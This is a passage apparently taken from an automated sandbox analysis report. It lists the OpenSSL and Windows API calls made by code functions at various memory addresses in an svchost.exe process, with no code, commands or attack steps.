    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA9B33 EVP_PKEY_free,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_new,ERR_new,ERR_set_debug,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestVerify,CRYPTO_free,ERR_new,ERR_set_debug,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,EVP_MD_CTX_free,49_2_00007FF8B7EA9B33
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7BB00 CRYPTO_free,49_2_00007FF8B7E7BB00
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EABAA0 ERR_new,ERR_set_debug,memset,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,ERR_new,ERR_new,ERR_set_debug,OPENSSL_cleanse,OPENSSL_cleanse,CRYPTO_clear_free,CRYPTO_clear_free,49_2_00007FF8B7EABAA0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E43A70 CRYPTO_free,CRYPTO_free,CRYPTO_free_ex_data,OPENSSL_LH_free,X509_STORE_free,CTLOG_STORE_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_free,OPENSSL_sk_pop_free,OPENSSL_sk_pop_free,OSSL_STACK_OF_X509_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_secure_free,EVP_MD_get0_provider,EVP_MD_free,EVP_MD_get0_provider,EVP_MD_free,EVP_CIPHER_get0_provider,EVP_CIPHER_free,EVP_MD_get0_provider,EVP_MD_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_THREAD_lock_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E43A70
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E53A70 CRYPTO_get_ex_data,49_2_00007FF8B7E53A70
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E71A60 CRYPTO_free,49_2_00007FF8B7E71A60
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3DA50 OPENSSL_sk_num,X509_STORE_CTX_new_ex,ERR_new,ERR_set_debug,ERR_set_error,OPENSSL_sk_value,X509_STORE_CTX_init,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,ERR_new,ERR_set_debug,ERR_set_error,X509_STORE_CTX_free,X509_STORE_CTX_set_flags,CRYPTO_THREAD_run_once,X509_STORE_CTX_set_ex_data,OPENSSL_sk_num,X509_STORE_CTX_set0_dane,X509_STORE_CTX_set_default,X509_VERIFY_PARAM_set1,X509_STORE_CTX_set_verify_cb,X509_verify_cert,X509_STORE_CTX_get_error,OSSL_STACK_OF_X509_free,X509_STORE_CTX_get0_chain,X509_STORE_CTX_get1_chain,ERR_new,ERR_set_debug,ERR_set_error,X509_VERIFY_PARAM_move_peername,X509_STORE_CTX_free,49_2_00007FF8B7E3DA50
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E8DA40 CRYPTO_memcmp,49_2_00007FF8B7E8DA40
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E39A20 EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_is_a,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_derive,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,EVP_PKEY_CTX_free,ERR_new,ERR_set_debug,49_2_00007FF8B7E39A20
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E679D0 CRYPTO_malloc,memcpy,BIO_snprintf,BIO_snprintf,CRYPTO_zalloc,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_strdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,BIO_new_file,BIO_free_all,CRYPTO_free,BIO_free_all,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E679D0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA99B3 CRYPTO_malloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,49_2_00007FF8B7EA99B3
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E719A0 CRYPTO_malloc,49_2_00007FF8B7E719A0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA999C EVP_MD_CTX_new,ERR_new,ERR_set_debug,X509_get0_pubkey,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,OSSL_STORE_INFO_get_type,EVP_MD_get0_name,EVP_DigestVerifyInit_ex,ERR_new,ERR_set_debug,OSSL_STORE_INFO_get_type,CRYPTO_malloc,BUF_reverse,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_MD_CTX_ctrl,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,BIO_free,EVP_MD_CTX_free,CRYPTO_free,49_2_00007FF8B7EA999C
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA9985 ERR_new,ERR_set_debug,EVP_PKEY_free,ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free,49_2_00007FF8B7EA9985
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E41950 CRYPTO_free,CRYPTO_strdup,49_2_00007FF8B7E41950
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E97920 ERR_new,ERR_set_debug,CRYPTO_malloc,COMP_expand_block,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,49_2_00007FF8B7E97920
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EBA8B0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,memcmp,OPENSSL_sk_num,OPENSSL_sk_value,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_dup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_free,ERR_new,OPENSSL_sk_free,OPENSSL_sk_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7EBA8B0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E5A8B0 EVP_PKEY_new,CRYPTO_malloc,CRYPTO_malloc,ERR_set_mark,EVP_PKEY_set_type,EVP_PKEY_CTX_new_from_pkey,EVP_PKEY_CTX_free,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,ERR_pop_to_mark,CRYPTO_free,CRYPTO_free,EVP_PKEY_free,49_2_00007FF8B7E5A8B0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E768B0 CRYPTO_zalloc,CRYPTO_free,49_2_00007FF8B7E768B0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EBC890 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_malloc,ERR_new,ERR_set_debug,EVP_PKEY_CTX_new_from_pkey,ERR_new,ERR_set_debug,EVP_PKEY_decrypt_init,EVP_PKEY_CTX_set_rsa_padding,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_uint32,OSSL_PARAM_construct_end,EVP_PKEY_CTX_set_params,EVP_PKEY_decrypt,OPENSSL_cleanse,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_CTX_free,49_2_00007FF8B7EBC890
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA2880 CRYPTO_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7EA2880
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3E880 CRYPTO_THREAD_run_once,49_2_00007FF8B7E3E880
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E32860 CRYPTO_zalloc,InitializeCriticalSection,49_2_00007FF8B7E32860
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E8A850 CRYPTO_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E8A850
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E88850 CRYPTO_realloc,49_2_00007FF8B7E88850
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E54840 memcpy,CRYPTO_THREAD_read_lock,OPENSSL_LH_retrieve,CRYPTO_THREAD_unlock,CRYPTO_THREAD_unlock,49_2_00007FF8B7E54840
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E38812 ERR_set_debug,CRYPTO_free,CRYPTO_strdup,ERR_new,49_2_00007FF8B7E38812
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7E810 CRYPTO_zalloc,49_2_00007FF8B7E7E810
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E84800 OPENSSL_LH_delete,CRYPTO_free,49_2_00007FF8B7E84800
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E327F0 DeleteCriticalSection,CRYPTO_free,49_2_00007FF8B7E327F0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EAC7E0 ERR_new,ERR_new,ERR_set_debug,EVP_PKEY_get1_encoded_public_key,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,BN_num_bits,BN_bn2bin,CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_clear_free,CRYPTO_clear_free,49_2_00007FF8B7EAC7E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E867D1 BIO_puts,BIO_puts,CRYPTO_zalloc,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,BIO_printf,CRYPTO_free,BIO_puts,49_2_00007FF8B7E867D1
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E807D0 CRYPTO_malloc,memcpy,CRYPTO_free,49_2_00007FF8B7E807D0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7A7D0 OPENSSL_LH_set_down_load,OPENSSL_LH_doall_arg,OPENSSL_LH_free,OPENSSL_LH_free,CRYPTO_free,49_2_00007FF8B7E7A7D0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E927B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,ERR_new,ERR_set_debug,CRYPTO_free,49_2_00007FF8B7E927B0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E8E790 CRYPTO_free,49_2_00007FF8B7E8E790
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E80770 CRYPTO_clear_free,CRYPTO_free,49_2_00007FF8B7E80770
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E82740 CRYPTO_zalloc,CRYPTO_zalloc,CRYPTO_zalloc,OPENSSL_cleanse,CRYPTO_free,49_2_00007FF8B7E82740
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E8E730 CRYPTO_free,49_2_00007FF8B7E8E730
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E38720 CRYPTO_free,CRYPTO_strdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,49_2_00007FF8B7E38720
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E3E700 CRYPTO_malloc,OPENSSL_sk_find,CRYPTO_free,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_set_error,49_2_00007FF8B7E3E700
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7C700 CRYPTO_malloc,memcmp,memcpy,memcpy,49_2_00007FF8B7E7C700
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E8E6D0 CRYPTO_malloc,49_2_00007FF8B7E8E6D0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E54660 CRYPTO_free,CRYPTO_malloc,memcpy,49_2_00007FF8B7E54660
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7E660 CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E7E660
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA2630 CRYPTO_memdup,CRYPTO_memdup,CRYPTO_memdup,CRYPTO_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7EA2630
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E82630 OPENSSL_cleanse,CRYPTO_free,49_2_00007FF8B7E82630
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E4C610 ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,EVP_MD_get_size,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,memcpy,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_insert,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,EVP_PKEY_free,EVP_PKEY_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,X509_free,OPENSSL_sk_new_null,OPENSSL_sk_push,ERR_new,ERR_set_debug,ERR_set_error,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,X509_free,CRYPTO_free,EVP_PKEY_free,CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,ERR_new,ERR_set_debug,ERR_set_error,49_2_00007FF8B7E4C610
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7A5C0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_free,CRYPTO_free,49_2_00007FF8B7E7A5C0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E825B0 OPENSSL_cleanse,CRYPTO_free,49_2_00007FF8B7E825B0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EBC5A0 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_strndup,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_memdup,OPENSSL_cleanse,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,49_2_00007FF8B7EBC5A0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E425A0 CRYPTO_strdup,CRYPTO_free,49_2_00007FF8B7E425A0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E645A0 BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,BN_copy,BN_free,BN_dup,CRYPTO_free,CRYPTO_strdup,49_2_00007FF8B7E645A0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E58580 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_free,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_new,ERR_set_mark,EVP_KEYMGMT_fetch,X509_STORE_CTX_get0_param,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_nid2obj,OBJ_create,OBJ_create,OBJ_create,OBJ_txt2nid,OBJ_txt2nid,OBJ_txt2nid,OBJ_add_sigid,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E58580
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E6E510 memcmp,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_set_error,ERR_set_debug,OSSL_ERR_STATE_new,OSSL_ERR_STATE_save,CRYPTO_free,49_2_00007FF8B7E6E510
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB2500 CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,49_2_00007FF8B7EB2500
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E424D0 CRYPTO_free,CRYPTO_free,OPENSSL_sk_pop_free,CRYPTO_free,49_2_00007FF8B7E424D0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E54490 CRYPTO_THREAD_read_lock,CRYPTO_THREAD_unlock,49_2_00007FF8B7E54490
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E72470 CRYPTO_zalloc,49_2_00007FF8B7E72470
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB4460 EVP_MD_CTX_new,ERR_new,ERR_set_debug,ERR_new,EVP_MD_get0_name,EVP_DigestSignInit_ex,ERR_new,EVP_PKEY_CTX_set_rsa_padding,EVP_PKEY_CTX_set_rsa_pss_saltlen,ERR_new,EVP_DigestSignUpdate,EVP_MD_CTX_ctrl,EVP_DigestSignFinal,CRYPTO_malloc,EVP_DigestSignFinal,ERR_new,ERR_new,EVP_DigestSign,ERR_new,CRYPTO_malloc,EVP_DigestSign,BUF_reverse,ERR_new,CRYPTO_free,EVP_MD_CTX_free,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_MD_CTX_free,49_2_00007FF8B7EB4460
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E32460 CRYPTO_malloc,CRYPTO_zalloc,InitializeCriticalSection,CreateSemaphoreA,CreateSemaphoreA,CloseHandle,CRYPTO_free,49_2_00007FF8B7E32460
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E50450 CRYPTO_free,EVP_PKEY_free,CRYPTO_free,49_2_00007FF8B7E50450
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB844C CRYPTO_free,CRYPTO_memdup,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,49_2_00007FF8B7EB844C
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB8426 ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_clear_free,49_2_00007FF8B7EB8426
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB8414 ERR_new,ERR_set_debug,OPENSSL_sk_new_null,ERR_new,ERR_set_debug,X509_new_ex,d2i_X509,CRYPTO_free,CRYPTO_memcmp,ERR_new,ERR_set_debug,OPENSSL_sk_push,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,OPENSSL_sk_num,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,OPENSSL_sk_value,X509_get0_pubkey,ERR_new,ERR_set_debug,X509_free,OPENSSL_sk_shift,OSSL_STACK_OF_X509_free,EVP_PKEY_free,ERR_new,ERR_set_debug,X509_free,OSSL_STACK_OF_X509_free,49_2_00007FF8B7EB8414
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E68400 CRYPTO_free,CRYPTO_free,CRYPTO_free,GetCurrentProcessId,OpenSSL_version,BIO_snprintf,49_2_00007FF8B7E68400
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E723F0 CRYPTO_free,49_2_00007FF8B7E723F0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E323C0 CloseHandle,CloseHandle,DeleteCriticalSection,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E323C0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E54380 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,49_2_00007FF8B7E54380
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EA0340 ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_malloc,ERR_new,ERR_set_debug,memcpy,ERR_new,ERR_set_debug,49_2_00007FF8B7EA0340
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E4A330 CRYPTO_memdup,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E4A330
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E64330 CRYPTO_free,CRYPTO_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,BN_free,49_2_00007FF8B7E64330
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E6A330 CRYPTO_zalloc,OPENSSL_LH_new,OPENSSL_LH_set_thunks,OPENSSL_LH_free,CRYPTO_free,49_2_00007FF8B7E6A330
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E922F0 BIO_write_ex,BIO_write_ex,CRYPTO_free,CRYPTO_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E922F0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9A2E0 RAND_bytes_ex,CRYPTO_malloc,memset,49_2_00007FF8B7E9A2E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB82E7 ERR_new,ERR_set_debug,CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,memcpy,memcpy,ERR_new,ERR_new,ERR_set_debug,ERR_new,ERR_new,memcpy,ERR_new,memcpy,CRYPTO_free,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7EB82E7
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB02C0 CRYPTO_zalloc,CRYPTO_malloc,CRYPTO_free,memcpy,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7EB02C0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E362C0 CRYPTO_clear_free,49_2_00007FF8B7E362C0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E5C2C0 CRYPTO_free,49_2_00007FF8B7E5C2C0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E7A2C0 CRYPTO_zalloc,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_insert,OPENSSL_LH_error,OPENSSL_LH_delete,CRYPTO_free,49_2_00007FF8B7E7A2C0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E402B0 CRYPTO_malloc,CRYPTO_free,CRYPTO_malloc,strncmp,CRYPTO_free,OPENSSL_sk_new_null,OPENSSL_sk_num,OPENSSL_sk_value,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_free,OPENSSL_sk_delete,OPENSSL_sk_num,OPENSSL_sk_push,CRYPTO_free,OPENSSL_sk_dup,OPENSSL_sk_free,OPENSSL_sk_set_cmp_func,OPENSSL_sk_sort,OPENSSL_sk_free,49_2_00007FF8B7E402B0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E54260 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,49_2_00007FF8B7E54260
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E4E220 CRYPTO_free,ERR_new,ERR_set_debug,ERR_set_error,BUF_MEM_free,EVP_MD_CTX_free,X509_free,X509_VERIFY_PARAM_move_peername,CRYPTO_free,49_2_00007FF8B7E4E220
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E481E0 CRYPTO_get_ex_data,49_2_00007FF8B7E481E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E721E0 CRYPTO_zalloc,BIO_ctrl,BIO_ctrl,49_2_00007FF8B7E721E0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E8A1D0 CRYPTO_realloc,49_2_00007FF8B7E8A1D0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E841B0 OPENSSL_LH_retrieve,CRYPTO_zalloc,OPENSSL_LH_insert,49_2_00007FF8B7E841B0
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E9C190 CRYPTO_zalloc,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,CRYPTO_free,ERR_new,ERR_set_debug,49_2_00007FF8B7E9C190
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7EB6190 ERR_new,ERR_set_debug,CRYPTO_memcmp,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_new,d2i_PUBKEY_ex,EVP_PKEY_missing_parameters,ERR_new,ERR_set_debug,ERR_new,ERR_set_debug,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,CRYPTO_free,EVP_PKEY_free,49_2_00007FF8B7EB6190
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E46190 CRYPTO_malloc,CRYPTO_free,49_2_00007FF8B7E46190
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E88160 CRYPTO_memdup,49_2_00007FF8B7E88160
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E54160 CRYPTO_THREAD_write_lock,CRYPTO_THREAD_unlock,49_2_00007FF8B7E54160
    Source: C:\Windows\System32\svchost.exeCode function: 49_2_00007FF8B7E58140 CRYPTO_malloc,CRYPTO_realloc,memset,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,CRYPTO_strdup,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,OSSL_PARAM_locate_const,OSSL_PARAM_get_uint,ERR_new,OSSL_PARAM_locate_const,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,OSSL_PARAM_locate_const,OSSL_PARAM_get_int,ERR_set_mark,EVP_KEYMGMT_free,ERR_pop_to_mark,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_new,ERR_set_debug,ERR_set_error,CRYPTO_free,CRYPTO_free,CRYPTO_free,49_2_00007FF8B7E58140
